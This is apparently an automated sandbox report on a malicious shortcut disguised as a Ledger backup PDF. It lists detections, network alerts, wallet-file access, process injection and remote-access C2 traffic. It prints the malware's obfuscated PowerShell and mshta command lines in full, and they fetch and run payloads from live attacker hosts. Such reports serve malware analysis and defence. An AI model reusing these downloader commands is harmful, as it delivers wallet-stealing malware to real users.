Summary | ZeroBOX

Ledger Backup Guide.pdf.lnk

Tags: Generic Malware, Admin Tool (Sysinternals etc ...), Antivirus, UPX, GIF Format, AntiDebug, Lnk Format, PE32, PE File, AntiVM, PowerShell
Category | Machine | Started | Completed
FILE | s1_win7_x6401 | July 31, 2024, 2:42 p.m. | July 31, 2024, 2:44 p.m.
Size 3.1KB
Type MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 2f7d198bd913d4694467e2ded0e55ead
SHA256 d835b3b8ebac5b8d51fc54ec1a640140abbb132f20afb13d6125ab5cdf92e029
CRC32 15D3D5ED
ssdeep 48:8c5abYx09PL1L89RN8ZNSDt+hjtWT2jvTcMdJ9Aa5:8c5Xx09PL1L8+AGjt7jQAqQ
Yara
  • Antivirus - Contains references to security software
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "YOJrRVJtLJap" "C:\Users\test22\AppData\Local\Temp\Ledger Backup Guide.pdf.lnk"

    PID: 2560
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $g='s:aLh43vArH20fMw6p917T/5.t'; &(-join($g[(996-996),(689-687),(-418+421)])) ~= (-join($g[(996-996),(689-687),(-418+421)])); ~= ^[ (-join($g[(294-280),(996-996),(725-721),(507-486),(689-687)])); foreach($n in @((386-382),(-941+966),(-367+392),(-106+123),(182-181),(979-957),(-369+391),(219-201),(-305+310),(-665+689),(-104+123),(-842+865),(-848+853),(792-768),(-440+459),(894-874),(407-396),(223-199),(-875+894),(575-559),(999-983),(217-195),(889-880),(-550+565),(220-211),(363-356),(716-694),(975-969),(-94+106),(-924+936),(699-679),(-806+819),(785-761),(-599+603),(1005-980),(-774+776))){$O+=$g[$n]}; ^[ $O;

      PID: 2672
      • mshta.exe "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta

        PID: 2808
        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;

          PID: 2948

IP Address Status Action
104.16.114.74 Active Moloch
109.71.208.62 Active Moloch
164.124.101.2 Active Moloch
199.91.155.9 Active Moloch
41.216.183.3 Active Moloch
94.154.172.166 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2043259 ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 104.16.114.74:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 94.154.172.166:80 2022482 ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 94.154.172.166:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 41.216.183.3:56001 -> 192.168.56.101:49177 2400002 ET DROP Spamhaus DROP Listed Traffic Inbound group 3 Misc Attack
TCP 192.168.56.101:49177 -> 41.216.183.3:56001 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 41.216.183.3:56001 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 41.216.183.3:56001 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 199.91.155.9:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49171 -> 199.91.155.9:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 94.154.172.166:80 2022520 ET POLICY Possible HTA Application Download Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 94.154.172.166:80 2027261 ET INFO Dotted Quad Host HTA Request Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 94.154.172.166:80 2024449 ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl Attempted User Privilege Gain
TCP 41.216.183.3:56001 -> 192.168.56.101:49177 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 41.216.183.3:56001 -> 192.168.56.101:49177 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 41.216.183.3:56001 -> 192.168.56.101:49177 2035595 ET MALWARE Generic AsyncRAT Style SSL Cert Domain Observed Used for C2 Detected
TCP 94.154.172.166:80 -> 192.168.56.101:49166 2024197 ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) A Network Trojan was detected
UDP 192.168.56.101:54148 -> 164.124.101.2:53 2036936 ET HUNTING File Sharing Related Domain in DNS Lookup (download .mediafire .com) Potentially Bad Traffic
TCP 94.154.172.166:80 -> 192.168.56.101:49166 2044909 ET MALWARE VBS/TrojanDownloader.Agent.XAO Payload Inbound A Network Trojan was detected
TCP 94.154.172.166:80 -> 192.168.56.101:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 94.154.172.166:80 -> 192.168.56.101:49172 2021954 ET MALWARE JS/Nemucod.M.gen downloading EXE payload A Network Trojan was detected
TCP 94.154.172.166:80 -> 192.168.56.101:49172 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 94.154.172.166:80 -> 192.168.56.101:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.101:49169 -> 104.16.114.74:443 | C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA | C=US, ST=Texas, O=MEDIAFIRE, LLC, CN=*.mediafire.com | 8b:fa:81:04:17:18:84:c4:3e:8e:d5:89:ad:d6:5d:bd:9a:df:84:da
TLSv1 192.168.56.101:49177 -> 41.216.183.3:56001 | CN=Rlofxutfz | CN=Rlofxutfz | 58:60:84:11:c2:61:e1:a9:6f:bb:95:ea:4a:07:95:10:c4:6f:7f:4f

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW (console_handle 0x00000023 to 0x00000047; error text joined across four buffer writes)

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.SecurityProtocolType" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Ssl3, Tls"."
1 1 0

WriteConsoleW

buffer: At line:1 char:491
console_handle: 0x00000053
1 1 0

WriteConsoleW (console_handle 0x0000005f to 0x0000015b: echo of the powershell.exe command line spawned by mshta.exe in the process tree; chunk containing the failure marker)

buffer: icePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$M
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000173
1 1 0

WriteConsoleW (console_handle 0x00000193 to 0x0000019f; error text joined across two buffer writes)

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connection was closed: An unexpected error occurred on a send."
1 1 0

WriteConsoleW

buffer: At line:1 char:577
console_handle: 0x000001ab
1 1 0

WriteConsoleW (console_handle 0x000001b7 to 0x000002b3: echo of the same command line; chunk containing the failure marker)

buffer: w = $OKwmuBS.DownloadData <<<< ($HftxTOL);return $MUUDRGgw};function hSqAuyRUp(
console_handle: 0x0000020b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000002bf
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000002cb
1 1 0

WriteConsoleW (console_handle 0x0000001b to 0x00000027; error text joined across two buffer writes)

buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null.
Parameter name: bytes"
1 1 0

WriteConsoleW

buffer: At line:1 char:61
console_handle: 0x00000033
1 1 0

WriteConsoleW (console_handle 0x0000003f to 0x0000006f: start of the same command-line echo; chunk containing the failure marker, after which the report's console log ends)

buffer: + function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes <<<< ($aGLtIzJ,
console_handle: 0x0000003f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00567bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features: Connection to IP address | suspicious_request: GET http://94.154.172.166/rwrv/3007f.hta
suspicious_features: GET method with no useragent header, Connection to IP address | suspicious_request: GET http://94.154.172.166/rwrv/23.exe
suspicious_features: GET method with no useragent header | suspicious_request: GET https://www.mediafire.com/file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file
request: GET http://94.154.172.166/rwrv/3007f.hta
request: GET http://94.154.172.166/rwrv/23.exe
request: GET http://poslisoubor.cz/gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt
request: GET https://www.mediafire.com/file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0


process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\23.exe
file C:\Users\test22\AppData\Local\Temp\Ledger Backup Guide.pdf.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
cmdline "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $g='s:aLh43vArH20fMw6p917T/5.t'; &(-join($g[(996-996),(689-687),(-418+421)])) ~= (-join($g[(996-996),(689-687),(-418+421)])); ~= ^[ (-join($g[(294-280),(996-996),(725-721),(507-486),(689-687)])); foreach($n in @((386-382),(-941+966),(-367+392),(-106+123),(182-181),(979-957),(-369+391),(219-201),(-305+310),(-665+689),(-104+123),(-842+865),(-848+853),(792-768),(-440+459),(894-874),(407-396),(223-199),(-875+894),(575-559),(999-983),(217-195),(889-880),(-550+565),(220-211),(363-356),(716-694),(975-969),(-94+106),(-924+936),(699-679),(-806+819),(785-761),(-599+603),(1005-980),(-774+776))){$O+=$g[$n]}; ^[ $O;
file C:\Users\test22\AppData\Roaming\23.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x003f0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data sent GET /rwrv/23.exe HTTP/1.1 Host: 94.154.172.166 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 41.216.183.3
host 94.154.172.166
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2116
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000170
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description RegAsm.exe tried to sleep 676584702 seconds, actually delayed analysis time by 676584702 seconds
file C:\Users\test22\AppData\Roaming\Electrum\wallets
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002dc
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
file C:\Users\test22\AppData\Roaming\23.exe
wmi SELECT * FROM AntiVirusProduct
wmi SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
wmi SELECT Caption FROM Win32_OperatingSystem
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰'rà 0„v. À@ @…$.OÀ\à .  H.text€‚ „ `.rsrc\À†@@.reloc àŒ@B
base_address: 0x00400000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€\ÀÌÌ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.04 InternalNameMseoc.exe&LegalCopyright*LegalTrademarks< OriginalFilenameMseoc.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0lÃê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0044c000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer: x>
base_address: 0x0044e000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2116
process_handle: 0x00000170
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰'rà 0„v. À@ @…$.OÀ\à .  H.text€‚ „ `.rsrc\À†@@.reloc àŒ@B
base_address: 0x00400000
process_identifier: 2116
process_handle: 0x00000170
1 1 0
Symantec ISB.Suspexec!gen48
ESET-NOD32 LNK/Agent.QK
Avast LNK:Agent-EJ [Trj]
ClamAV Lnk.Dropper.Agent-9982181-0
Sophos Troj/LnkObf-G
SentinelOne Static AI - Suspicious LNK
Google Detected
VBA32 Trojan.Link.ShellCmd
Zoner Probably Heur.LNKScript
Fortinet LNK/Agent.9982181!tr
AVG LNK:Agent-EJ [Trj]
Time & API Arguments Status Return Repeated

send

buffer: tpf©Î®sY Ñ7ä\¤âè «ÐêÔR[ÖJ'êk£8/5 ÀÀÀ À 28/ÿwww.mediafire.com  
socket: 1436
sent: 121
1 121 0

send

buffer: FBAsªö†°ýƃ55— fÌhö2:æ¦#?’¾æÃ|òÃu² o’³ ½§<ØÄiWí3؛Lví×æ>C]¨x0‡vŽ: ¤WÛk[f…uF9q<×>ië‘Í/çúŠVñ—\¯¬+8¬¥’ý°“a\´
socket: 1436
sent: 134
1 134 0

send

buffer: l‚kuSìöâ±2ðˆ~á˜N…6.*ÀP)jß·ìa¾¸NDÿÔ R2‚"U;†ù7\¸„yƁAlH;@r¨bŒ6B”’¦ÖÝM åd”#²´è@‘Lõaü:…½…F÷ ¦2ý³Ï>©(™æ<È lîeÑâŸN Ó’± 8æ ÅÖv*ºÊΧ
socket: 1436
sent: 149
1 149 0

send

buffer: }yf©Î®^h15Pœbȕïd 'lR²ð÷žÈžjÞߛ ˜ô/5 ÀÀÀ À 288ÿdownload2268.mediafire.com  
socket: 1944
sent: 130
1 130 0

send

buffer: }yf©Î¯’$².ÚÜøáBYíütÁ2*ծݎ1N"³ˆ¹ /5 ÀÀÀ À 288ÿdownload2268.mediafire.com  
socket: 1944
sent: 130
1 130 0

send

buffer: GET /rwrv/23.exe HTTP/1.1 Host: 94.154.172.166 Connection: Keep-Alive
socket: 908
sent: 75
1 75 0
Process injection Process 604 called NtSetContextThread to modify thread in remote process 2116
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3406996
registers.edi: 0
registers.eax: 4206198
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000fc
process_identifier: 2116
1 0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\23.exe
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\file
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\23.exe"
parent_process powershell.exe martian_process "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
Process injection Process 2560 resumed a thread in remote process 2672
Process injection Process 604 resumed a thread in remote process 2116
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 2116
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2676
thread_handle: 0x00000334
process_identifier: 2672
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
